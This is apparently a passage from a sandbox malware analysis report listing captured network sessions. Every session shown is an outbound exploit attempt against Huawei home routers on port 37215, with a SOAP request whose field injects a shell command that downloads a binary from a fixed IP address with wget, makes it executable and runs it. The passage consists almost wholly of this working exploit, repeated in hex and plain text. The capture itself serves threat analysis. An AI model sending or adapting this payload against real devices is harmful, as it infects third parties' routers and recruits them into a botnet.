                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1353192.168.2.156039631.178.18.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399017096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1354192.168.2.155106631.113.92.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399017096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1355192.168.2.1553262157.67.197.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399030924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1356192.168.2.1550590157.114.242.3937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399049044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1357192.168.2.155295894.61.184.7937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399076939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1358192.168.2.1548880122.65.187.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399092913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1359192.168.2.153757494.143.150.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399116039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1360192.168.2.154730457.124.84.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399135113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1361192.168.2.1549394156.72.94.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399157047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1362192.168.2.154038094.148.80.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399174929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
